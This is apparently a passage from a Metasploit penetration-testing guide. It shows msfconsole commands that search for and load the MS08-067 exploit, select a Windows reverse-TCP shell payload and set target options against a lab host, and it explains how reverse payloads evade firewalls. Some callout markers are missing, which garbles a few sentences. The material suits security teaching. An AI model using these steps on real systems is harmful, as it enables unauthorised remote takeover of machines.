Exploitation is the pinnacle of many security professionals’ careers. The ability to gain full control over a targeted machine is a great feeling, if perhaps a little scary. But even though exploitation techniques have advanced quite a bit over the years, the adoption of various system and network protections has made it increasingly more difficult to succeed with basic exploits. In this chapter, we move into more difficult attack methods, beginning with command-line interfaces to the Metasploit Framework. Most of the attacks and customizations discussed in this chapter will occur in msfconsole, msfencode, and msfpayload.
Before you begin to exploit systems, you need to understand a few things about penetration testing and exploitation. In Chapter 1 you were introduced to basic penetration testing methods. In Chapter 2 you learned the basics of the Framework and what to expect from each tool. In Chapter 3 we explored the intelligence gathering phase, and in Chapter 4 you learned about vulnerability scanning.
In this chapter, we focus on the basics of exploitation. Our goal is to familiarize you with the different commands available through the Framework, which we’ll build upon in later chapters. Most of the attacks from this point forward will occur through msfconsole, and you will need a solid understanding of msfconsole, msfpayload, and msfencode to get the most out of the balance of this book.
The Metasploit Framework contains hundreds of modules, and it’s nearly impossible to remember them all. Running show from msfconsole will display every module available in the Framework, but you can also narrow your search by displaying only specific types of modules as discussed in the following sections.
Within msfconsole, exploits operate against the vulnerabilities that you discover during a penetration test. New exploits are always being developed, and the list will continue to grow. This command will display every currently available exploit within the Framework.
Auxiliary modules in Metasploit can be used for a wide range of purposes. They can operate as scanners, denial-of-service modules, fuzzers, and much more. This command will display them and list their features.
Options control various settings needed for proper functionality of the Framework modules. When you run show options while a module is selected, Metasploit will display only the options that apply to that particular module. Entering msf> show options when not in a module will display the available global options—for example, you can set LogLevel to be more verbose as you perform an attack. You can also issue the back command to go back once inside a module.
msf >use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) >backmsf >
The search command is useful for finding a specific attack, auxiliary module, or payload. For example, if you want to launch an attack against SQL, you could search for SQL like this:
msf >search mssql[*] Searching loaded modules for pattern 'mssql'... Auxiliary ========= Name Disclosure Date Rank Description ---- --------------- ---- ----------- admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution admin/mssql/mssql_idf normal Microsoft SQL Server - Interesting Data Finder admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query scanner/mssql/mssql_login normal MSSQL Login Utility scanner/mssql/mssql_ping normal MSSQL Ping Utility Exploits. . . SNIP . . .msf >
Or, to find the MS08-067 exploit specifically (an exploit related to the notorious Conficker worm that exploited a weakness within the Remote Procedure Call [RPC] service), you would enter this command:
msf >search ms08_067[*] Searching loaded modules for pattern 'ms08_067'... Exploits ======== Name Rank Description ---- ---- -----------windows/smb/ms08_067_netapigreat Microsoft Server Service Relative Path Stack Corruption
Then, having found an exploit (windows/smb/ms08_067_netapi), you could load the found module with the use command, like so:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >Notice that when we issue the use windows/smb/ms08_067_netapi command, the msf prompt changes as follows:
msf exploit(ms08_067_netapi) >
This indicates that we have selected the ms08_067_netapi module and that commands issued at this prompt will be performed under that exploit.
Note
You can perform a search or use at any time within an exploit to switch to a different exploit or module.
Now, with the prompt reflecting our chosen module, we can enter show options to display the options specific to the MS08-067 exploit:
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >This contextual approach to accessing options keeps the interface simpler and allows you to focus only on the options that matter at the moment.
Recall from Chapter 2 that payloads are platform-specific portions of code delivered to a target. As with show options, when you run show payloads from a module-specific prompt, Metasploit displays only the payloads that are compatible with that module. In the case of Microsoft Windows–based exploits, these payloads may be as simple as a command prompt on the target or as complex as a full graphical interface on the target machine. To see an active list of payloads, run the following command:
msf> show payloadsThis would show you all payloads available in Metasploit; however, if you are in an actual exploit, you will see only payloads applicable to the attack. For example, running show payloads from the msf exploit(ms08_067_netapi) prompt would result in the output shown next.
In the previous example we searched for the MS08-067 module. Now let’s find out the payloads for that module by entering show payloads. Notice in the example that only Windows-based payloads are shown. Metasploit will generally identify the type of payloads that can be used with a particular attack.
msf exploit(ms08_067_netapi) >show payloadsCompatible Payloads =================== Name Rank Description ---- ---- -----------. . . SNIP . . .windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
Next, we enter set payload windows/shell/reverse_tcp to select the reverse_tcp payload. When we enter show options again we see that additional options are shown:
msf exploit(ms08_067_netapi) >set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) >
show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port
Notice that when the payload is selected at and the options are displayed at , we are presented with some additional options in the payload section at , such as LHOST and LPORT. In this example, you could configure the payload to connect back to the attacker machine on a specific IP address and port number, called a reverse payload. In reverse payloads, the connection is actually triggered by the target machine and it connects to the attacker. You might use this technique to circumvent a firewall or NAT installation.
We’ll configure this exploit with both the LHOST and RHOST options. LHOST, our attacking machine, will connect back from the target machine (RHOST) on the default TCP port (4444).
Modules often list vulnerable potential targets. For example, because the vulnerability targeted by MS08-067 relies on hard-coded memory addresses, the exploit is specific to operating systems with specific patch levels, language version, and security implementations (as explained in detail in Chapter 14 and Chapter 15). Using the show targets command at the msf MS08-067 prompt displays a list of 60 exploit targets (with only a portion shown in the following example). The success of the exploit will depend on the version of Windows you are targeting. Sometimes automatic detection will not work and could even trigger the wrong exploit, which will usually lead to a service crash.
msf exploit(ms08_067_netapi) >show targetsExploit targets: Id Name -- ----
In this example, you can see that the exploit lists Automatic Targeting as one option. Often, an exploit module will attempt to target the operating system automatically based on its version and select an exploit based on the system’s fingerprint. However, it’s often best to try to identify the appropriate exploit yourself to avoid triggering the wrong exploit or a potentially destructive one.
Note
This particular exploit is temperamental, and it has a tough time determining the operating system. If you use this exploit, be sure to set the target as the specific operating system you use in testing on your VM (Windows XP SP2).
When the short description of a module provided by the show and search commands isn’t sufficient, use the info command followed by the module name to display all the information, options, and targets available for that module:
msf exploit(ms08_067_netapi) > infoAll the options for a given Metasploit module must be either set or unset, especially if they are marked as required or yes. When you enter show options, you will see information that specifies whether a field is required. Use the set command to set an option (turn it on); use unset to turn a setting off. The next listing shows the set and unset commands in use.
Note
Notice that the variables are referenced using uppercase characters. This isn’t required, but it is considered good practice.
msf exploit(ms08_067_netapi) >set RHOST 192.168.1.155set TARGET 3show options
At we set the target IP address (RHOST) to 192.168.1.155 (our target machine). At we set the target to 3, the “Windows XP SP2 English (NX)” that we listed with show targets in msf> show targets in msf> show targets. Running show options at confirms that our settings have been populated, as shown in the Module options output.
The setg and unsetg commands are used to set or unset a parameter globally within msfconsole. Using these commands can save you from having to re-enter the same information repeatedly, particularly in the case of frequently used options that rarely change, such as LHOST.
Having configured global options with the setg command, use the save command to save your current settings so they will be available next time you run the console. You can enter the save command at any time in Metasploit to save your current place.
msf exploit(ms08_067_netapi) > save
Saved configuration to: /root/.msf3/config
msf exploit(ms08_067_netapi) >The location in which the configuration is stored, /root/.msf3/config, is shown on the screen. If for some reason you need to start over, move or delete this file to revert to the default settings.